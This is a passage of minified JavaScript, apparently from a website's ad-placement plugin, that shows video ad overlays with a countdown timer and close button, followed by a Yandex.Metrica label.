');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика